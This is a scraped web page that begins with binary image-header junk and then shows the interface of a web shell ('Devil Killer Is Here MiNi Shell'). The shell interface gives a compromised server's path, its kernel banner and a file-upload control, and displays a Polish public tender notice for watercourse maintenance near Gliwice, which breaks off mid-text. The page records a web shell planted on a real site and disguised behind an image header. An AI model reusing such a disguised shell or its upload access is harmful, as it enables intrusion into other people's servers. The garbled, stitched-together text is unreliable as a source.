JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20240319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20240319/0024987301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Prace utrzymaniowe cieków będących w administracji Zarządu Zlewni w Gliwicach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Gospodarstwo Wodne Wody Polskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 368302575</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żelazna 59a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-848</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gliwice@wody.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.gov.pl/web/wody-polskie</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Prace utrzymaniowe cieków będących w administracji Zarządu Zlewni w Gliwicach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-abe287a7-e509-11ee-9c02-ce2b643d361d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00249873</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-03-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00225727/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.18 Prace utrzymaniowe cieków będących w administracji Zarządu Zlewni w Gliwicach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.przetargi.wody.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://www.przetargi.wody.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Zgodnie z art. 61 ust. 1 ustawy Pzp, komunikacja między Zamawiającym a Wykonawcami odbywa się w formie elektronicznej, za pośrednictwem Platformy Zakupowej – zwanej dalej „Platformą” – pod adresem: https://przetargi.wody.gov.pl/.<br/>2. Korzystanie z Platformy jest nieodpłatne. Instrukcja korzystania z Platformy znajduje się pod adresem: www.przetargi.wody.gov.pl<br/>w zakładce: Instrukcja dla Wykonawców.<br/>3. Korzystanie z Platformy nie wymaga zarejestrowania konta na Platformie.<br/>4. Dokumenty związane z postępowaniem Zamawiający zamieszcza na Platformie w zakładce z przedmiotowym postępowaniem.<br/>5. Celem skomunikowania się z Zamawiającym (z wyłączeniem złożenia oferty oraz dokumentów lub oświadczeń składanych razem z ofertą, których sposób złożenia został opisany w pkt 14.1 – 14.6 specyfikacji warunków zamówienia, zwanej dalej „SWZ”), Wykonawca korzysta z zakładki „Zapytaj”. Zakładka ta służy również Zamawiającemu do komunikacji z Wykonawcami.<br/>6. Za datę wpływu wszelkiej korespondencji do Zamawiającego, w tym złożenia oferty oraz dokumentów lub oświadczeń składanych<br/>razem z ofertą, uważa się datę wczytania korespondencji na Platformie.<br/>7. Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ. Zamawiający jest obowiązany udzielić wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu składania ofert, pod warunkiem że wniosek o wyjaśnienie treści SWZ wpłynął do zamawiającego nie później niż na 4 dni przed upływem terminu składania ofert.<br/>8. Jeżeli Zamawiający nie udzieli wyjaśnień w terminie, o którym mowa w pkt. 3.7, przedłuży termin składania ofert o czas niezbędny do zapoznania się wszystkich zainteresowanych Wykonawców z wyjaśnieniami niezbędnymi do należytego przygotowania i złożenia ofert.<br/>9. Treść wszystkich zapytań wraz wyjaśnieniami, Zamawiający udostępni/bez ujawniania źródła zapytania/na stronie internetowej<br/>prowadzonego postępowania, na której SWZ jest udostępniona. W przypadku rozbieżności pomiędzy treścią SWZ, a treścią udzielonych odpowiedzi, jako obowiązującą należy przyjąć treść pisma zawierającego późniejsze wyjaśnienia/oświadczenie Zamawiającego.<br/>10. Wszelkie wyjaśnienia, modyfikacje treści SWZ oraz inne informacje związane z niniejszym postępowaniem Zamawiający będzie zamieszczał wyłącznie na Platformie zakupowej w zakładce z przedmiotowym postępowaniem.<br/>11. Zamawiający zaleca sporządzenie korespondencji w następujących formatach: .doc., docx, .rtf, pdf, .xls.<br/>12. Zamawiający informuje, że adres e-mail: gliwice@wody.gov.pl oraz zamowienia.rzgwgliwice@wody.gov.pl wskazany w<br/>ogłoszeniu o zamówieniu, służy jedynie do przesyłania ogłoszeń i otrzymywania informacji zwrotnej z Dziennika Urzędowego Unii<br/>Europejskiej. Nie jest to adres do komunikacji z Wykonawcami.<br/>13. Maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy wynosi 150 MB.<br/>14. Dokumenty elektroniczne, oświadczenia lub cyfrowe odwzorowania dokumentów lub oświadczeń składane są przez Wykonawcę<br/>za pośrednictwem Platformy jako załączniki.<br/>15. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub cyfrowych odwzorowań dokumentów lub oświadczeń musi<br/>być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia<br/>23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Informacja dotycząca przetwarzania danych osobowych. Zgodnie z art. 13 ust. 1 i 2rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>a) administratorem Pani/Pana danych osobowych jest Państwowe Gospodarstwo Wodne Wody Polskie z siedzibą w Warszawie przy ul. Żelaznej 59A, 00-848 Warszawa, REGON: 368302575, NIP: 527-282-56-16;<br/>b) kontakt z Inspektorem ochrony danych w PGW WP możliwy jest pod adresem e-mail: iod@wody.gov.pl;<br/>c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego prowadzonym na podstawie ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych;<br/>d) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania,<br/>e) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień<br/>publicznych, przez okres 4 lat licząc od końca roku kalendarzowego, w którym zakończono postępowanie o udzielenie zamówienia,<br/>a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>f) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych;<br/>g) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO.<br/>h) posiada Pani/Pan:<br/>na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych (skorzystanie z prawa do<br/>sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą<br/>postanowień umowy w zakresie niezgodnym z przepisami ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych oraz nie<br/>może naruszać integralności protokołu oraz jego załączników);<br/>na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej lub państwa członkowskiego);<br/>prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają Państwo, że przetwarzanie danych osobowych Państwa dotyczących narusza przepisy RODO<br/>i) nie przysługuje Państwu:<br/>w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">C.ROZ.2710.10.2024.APS</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 1052702,29 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> część nr 1 - Prace utrzymaniowe cieku Ligockiego w km 4+490 - 10+070 w m. Kotulin, Ligota Toszecka, Boguszyce, gm. Toszek<br/>Prace (stawka VAT 23%) będą polegały m. innymi na:<br/>•	Wykoszeniu porostów gęstych, twardych ze skarp i dna cieku wraz z wygrabieniem;<br/>•	Hakowaniu roślin korzeniących się w dnie;<br/>•	Ręcznym ścinaniu zakrzaczeń wraz z oczyszczeniem terenu po wycince z wywiezieniem;<br/>•	Remoncie umocnienia z trylinki na skarpach i w dnie cieku;<br/>•	Zabudowie wyrwy brzegowej.<br/>Prace należy prowadzić pod nadzorem przyrodniczym. Koszty wynikające z tego tytułu Wykonawca winien wliczyć w cenę oferty w kosztach ogólnych. Dokumentację z pełnienia nadzoru przyrodniczego, Wykonawca przekaże Zleceniodawcy w dniu odbioru robót. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 124259,96 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45246400-7 - Roboty w zakresie ochrony przeciwpowodziowej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">56 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">14.2	Oferty oceniane będą na podstawie następujących kryteriów:<br/>14.2.1	Cena brutto – waga 60 %<br/>14.2.2	Termin realizacji zamówienia - waga 40 %<br/>14.3	Ocena ofert zostanie dokonana wg poniższego wzoru:<br/>P= Pc + Pt<br/>gdzie:<br/>P– łączna liczba punktów przyznanych badanej ofercie,<br/>Pc – liczba punktów w kryterium „cena brutto”,<br/>Pt – liczba punktów kryterium „termin realizacji zamówienia”.<br/>14.4	Ocena w poszczególnych kryteriach dokonywana będzie na poniższych zasadach:<br/>14.4.1	Każda z ważnych ofert będzie punktowana w kryterium określonym w pkt 14.2.1 SWZ poprzez porównanie ceny brutto oferty badanej do ceny brutto najniższej ze wszystkich ważnych ofert wg poniższego wzoru:<br/>Pc= (Cn:Cb) x 60<br/>gdzie:<br/>Cn– cena brutto najniższa spośród wszystkich ofert podlegających ocenie,<br/>Cb– cena brutto oferty badanej.<br/>14.4.2	Każda z ważnych ofert będzie punktowana w kryterium określonym w pkt 14.2.2 SWZ poprzez przyznanie punktów za zaoferowany termin realizacji zamówienia określone w pkt. 14.2.2 SWZ w następujący sposób:<br/><br/>Część nr 1,2 <br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania	do 6 tygodni od daty przekazania terenu	40<br/>2 do 7 tygodni od daty przekazania terenu	20<br/>3 do 8 tygodni od daty przekazania terenu	0<br/><br/>Część nr 3<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania	do 01.10.2024 r.	40<br/>2 do 08.10.2024 r.	20<br/>3 do 15.10.2024 r.	0<br/><br/><br/>Część nr 4,6<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania	do 11.10.2024 r.	40<br/>2 do 18.10.2024 r.	20<br/>3 do 25.10.2024 r.	0<br/><br/>Część nr 5<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania	do 4 tygodni od daty przekazania terenu	40<br/>2 do 5 tygodni od daty przekazania terenu	20<br/>3 do 6 tygodni od daty przekazania terenu	0<br/><br/>Punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/><br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą ilość punktów za wszystkie kryteria z ofert nieodrzuconych, wg wzoru:<br/><br/>Ł= C+T<br/><br/>gdzie:<br/>Ł - łączna ilość punktów za wszystkie kryteria<br/>C - punkty przyznane w kryterium „Cena”<br/>T - punkty przyznane w kryterium „Termin wykonania”<br/>14.5	Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w SWZ. Za najkorzystniejszą zostanie uznana oferta, która łącznie (suma punktów przyznanych we wszystkich kryteriach oceny ofert) uzyska największą liczbę punktów obliczonych zgodnie z wzorem określonym w pkt 14.3 SWZ.<br/>14.6	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> część nr 2 - Prace utrzymaniowe koryta cieku Rokitnickiego w km 4+800-8+372 oraz 16+480 - 17+844 na terenie m. Czekanów, Zabrze, Bytom, gm. Zbrosławice, Zabrze, Bytom<br/><br/>Prace (stawka VAT 23%) będą polegały m. innymi na:<br/>•	Wykoszeniu porostów ze skarp i dna cieku wraz z wygrabieniem,<br/>•	Wycince zakrzaczeń wraz z oczyszczeniem terenu po wycince z wywiezieniem,<br/>•	Udrożnieniu koryta poprzez mechaniczne usunięcie roślinności korzeniącej się, usunięcie namulisk, zatorów i przetamowań wraz z rozplantowaniem urobku wzdłuż krawędzi brzegu.<br/><br/>Prace należy prowadzić pod nadzorem przyrodniczym. Koszty wynikające z tego tytułu Wykonawca winien wliczyć w cenę oferty w kosztach ogólnych. Dokumentację z pełnienia nadzoru przyrodniczego, Wykonawca przekaże Zleceniodawcy w dniu odbioru robót. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 169955,36 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45246400-7 - Roboty w zakresie ochrony przeciwpowodziowej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">56 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">14.2	Oferty oceniane będą na podstawie następujących kryteriów:<br/>14.2.1	Cena brutto – waga 60 %<br/>14.2.2	Termin realizacji zamówienia - waga 40 %<br/>14.3	Ocena ofert zostanie dokonana wg poniższego wzoru:<br/>P= Pc + Pt<br/>gdzie:<br/>P– łączna liczba punktów przyznanych badanej ofercie,<br/>Pc – liczba punktów w kryterium „cena brutto”,<br/>Pt – liczba punktów kryterium „termin realizacji zamówienia”.<br/>14.4	Ocena w poszczególnych kryteriach dokonywana będzie na poniższych zasadach:<br/>14.4.1	Każda z ważnych ofert będzie punktowana w kryterium określonym w pkt 14.2.1 SWZ poprzez porównanie ceny brutto oferty badanej do ceny brutto najniższej ze wszystkich ważnych ofert wg poniższego wzoru:<br/>Pc= (Cn:Cb) x 60<br/>gdzie:<br/>Cn– cena brutto najniższa spośród wszystkich ofert podlegających ocenie,<br/>Cb– cena brutto oferty badanej.<br/>14.4.2	Każda z ważnych ofert będzie punktowana w kryterium określonym w pkt 14.2.2 SWZ poprzez przyznanie punktów za zaoferowany termin realizacji zamówienia określone w pkt. 14.2.2 SWZ w następujący sposób:<br/><br/>Część nr 1,2 <br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania	do 6 tygodni od daty przekazania terenu	40<br/>2 do 7 tygodni od daty przekazania terenu	20<br/>3 do 8 tygodni od daty przekazania terenu	0<br/><br/>Część nr 3<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania	do 01.10.2024 r.	40<br/>2 do 08.10.2024 r.	20<br/>3 do 15.10.2024 r.	0<br/><br/><br/>Część nr 4,6<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania	do 11.10.2024 r.	40<br/>2 do 18.10.2024 r.	20<br/>3 do 25.10.2024 r.	0<br/><br/>Część nr 5<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania	do 4 tygodni od daty przekazania terenu	40<br/>2 do 5 tygodni od daty przekazania terenu	20<br/>3 do 6 tygodni od daty przekazania terenu	0<br/><br/>Punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/><br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą ilość punktów za wszystkie kryteria z ofert nieodrzuconych, wg wzoru:<br/><br/>Ł= C+T<br/><br/>gdzie:<br/>Ł - łączna ilość punktów za wszystkie kryteria<br/>C - punkty 